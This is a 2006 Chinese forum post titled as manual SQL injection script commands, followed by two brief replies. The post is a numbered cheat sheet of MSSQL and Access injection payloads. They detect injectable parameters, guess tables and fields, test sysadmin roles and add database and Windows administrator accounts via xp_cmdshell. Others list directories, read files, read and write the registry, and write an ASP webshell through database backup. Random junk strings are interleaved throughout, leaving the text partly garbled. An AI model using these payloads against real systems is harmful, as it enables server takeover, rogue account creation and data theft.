社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 5075阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 ~'iuh>O)  
  2.初步判断是否是mssql ;and user>0 Qz;" b!  
rE~O}2a#H  
  3.注入参数是字符'and [查询条件] and ''=' %SXqJW^:  
r; !us~  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' 5S bSz!s`$  
c2"OpI  
  5.判断数据库系统 Xw)+5+t"{  
s]OXB {M  
  ;and (select count(*) from sysobjects)>0 mssql 0@;E8^pa  
m^KkS   
  ;and (select count(*) from msysobjects)>0 access ?zqXHv#x  
G>"[nXmcu  
<o}t-Bgg  
*L_wRhhk  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 '#?hm-Ga  
'/?&Gol-  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 u"ow?[E  
3kg+*]tLx  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 &(0);I@fc  
q~C6+  
  9.(1)猜字段的ascii值(access) 3:S"!F  
up6LO7drW/  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 9AaixI  
4 @h6|=  
  (2)猜字段的ascii值(mssql) $MHc4FE[  
ww*F}}(  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 M:N> {_1&  
UPsh Y  
  10.测试权限结构(mssql) u#QQCgrs  
'WoX-y  
$ a7^3  
hQO~9mQ+!  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- kJ >B)  
Y&?]t  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- xi0&"?7la  
z`CI gSR  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- zi'?FM[f)  
xhv)rhu@  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ~mU#u\r(*  
]up:pddIh  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- }Na*jr0y9{  
qSR %#  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- yL1\V7GI{[  
O;r8l+  
  ;and 1=(select IS_MEMBER('db_owner'));-- #0tM88Wi  
F7d f  
0@KBQv"v  
.KV?;{~q@  
  11.添加mssql和系统的帐户 k<y$[xV  
?*g]27f11  
  ;exec master.dbo.sp_addlogin username;-- 'tc$#f^:  
  ;exec master.dbo.sp_password null,username,password;-- $xqphhBg  
F-t-d1w6  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- P`0aU3pl  
Z(FAQ\7  
  ;exec master.dbo.xp_cmdshell 'net user username password 4CqZvd C  
3ul  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- |<S9nZg%p  
(fl2?d5+C  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- p n)5neX{  
Sc(2c.HO*  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- mGX;JOjZ  
59LIK&w  
&'Ch[Wo]H  
h$3Y,-4  
  12.(1)遍历目录 ~lMsD~$sO  
qe0@tKim  
  ;create table dirs(paths varchar(100), id int) {=kA8U  
/#HY-b  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' !&X}? NK  
HV>Wf"1  
  ;and (select top 1 paths from dirs)>0 CUoMB r  
nt7ui*k  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) sfH|sp  
0&Qn7L  
)pJzw-m"  
?tBEB5  
  (2)遍历目录 ;2$^=:8  
ky*-_  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- F4@h} T5)  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ][9M_.  
nt4>9;  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 hFKYRZtP.8  
$`i&\O2*  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 VFyt9:a  
m{' q(w}  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 }b44^iL$9y  
tNtP+v-{  
X|b~,X%N  
FT=w`NE,+  
  13.mssql中的存储过程 Pai{?<zGi  
VF4F7'  
  xp_regenumvalues 注册表根键, 子键 ks! G \<I  
tTY(I1  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 .DT1Jvl  
p B )nQ5l'  
  xp_regread 根键,子键,键值名 6(wpf^br2  
1iz\8R:0  
  ;exec xp_regread .NabK  
U7Ps2~x3  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 \KG{ 11  
&9'6hMu  
  xp_regwrite 根键,子键, 值名, 值类型, 值 KzhldMJ^zq  
@wB$qd;v  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 % Dya-  
~;{)S}U@R  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 C! :\H<gI  
>2_J(vm>  
  xp_regdeletevalue 根键,子键,值名 [IMa0qs'  
idV4hMF9  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 sb;81?|  
f9!wO';P6  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ~6R| a  
m]V5}-?al  
!Y5O3^I=u  
m'Wz0b^BO  
  14.mssql的backup创建webshell I'C{=?  
ybfNG@N*  
  use model &K}!R$[,:P  
2mI=V.X[&  
  create table cmd(str image); ms<?BgCSz  
, !c.  
  insert into cmd(str) values (''); fAJQ8nb{@]  
'9-8_;  
  backup database model to disk='c:\l.asp'; 1Ocyrn  
5gi`&t`  
XjWoUnz  
WPLAh_fe  
  15.mssql内置函数 `_<K#AGAi  
V\Rbnvq  
  ;and (select @@version)>0 获得Windows的版本号 >0{{ loqq  
" GgK,d}%  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa $/6.4" j  
n pBpYtG  
  ;and (select user_name())>0 爆当前系统的连接用户 \6*3&p  
nx=Zl:Q}  
  ;and (select db_name())>0 得到当前连接的数据库 3nxJ`W5j  
MAhcwmZNy  
J-hP4t&x  
T0v;8E e  
  16.简洁的webshell |0dmdrKD  
#R@{Bu=C  
  use model ? %F*{3IP  
F.K7w  
  create table cmd(str image); m@)K]0g<f  
59IxY ?  
  insert into cmd(str) values (''); uEH&]M>d_  
Rm{S,  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
批量上传需要先选择文件,再选择上传
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八